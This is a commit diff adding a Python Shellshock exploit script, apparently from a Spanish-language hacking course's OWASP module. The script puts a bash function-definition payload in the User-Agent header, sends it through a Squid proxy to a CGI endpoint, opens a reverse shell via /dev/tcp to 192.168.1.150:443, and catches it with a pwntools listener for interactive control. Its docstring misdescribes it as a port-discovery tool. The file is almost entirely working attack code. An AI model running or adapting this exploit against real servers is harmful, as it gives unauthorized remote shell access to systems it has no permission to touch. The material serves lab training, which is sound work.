Add shellshock

Introduccion-hacking-hack4u/tema_6_owasp/25_shellshock/shellshock.py

@@ -0,0 +1,65 @@
+# /var/bin/env python3
+"""
+Script para descubrir puertos abiertos en un servidor web 
+a través de un proxy Squid.
+"""
+
+
+import requests
+import signal
+import sys
+import threading
+
+from pwn import *
+from termcolor import colored
+
+
+def signal_handler(sig, frame):
+    print(colored('\n\n[!] Saliendo con Ctrl+C!\n', 'red'))
+    sys.exit(0)
+
+
+# Ctrl+C handler
+signal.signal(signal.SIGINT, signal_handler)
+
+MAIN_URL = "http://127.0.0.1/cgi-bin/status"
+squid_proxy = {'http': 'http://192.168.1.150:3128'}
+lport = 443
+
+
+def shellshock_attack():
+
+    headers = {
+        "User-Agent": "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.150/443 0>&1'"
+    }
+
+    r = requests.get(
+        MAIN_URL, headers=headers,
+        proxies=squid_proxy, timeout=1
+    )
+
+
+if __name__ == "__main__":
+
+    try:
+
+        threading.Thread(target=shellshock_attack(), args=()).start()
+
+    except Exception as e:
+
+        log.error(str(e))
+
+    shell = listen(lport, timeout=20).wait_for_connection()
+
+    if shell.sock is None:
+
+        log.failure(colored(
+            "\n[!] No se ha podido establecer la conexión\n", "red"
+        ))
+
+        sys.exit(1)
+
+    else:
+
+        log.success(colored("\n[+] Conexión establecida\n", "green"))
+        shell.interactive()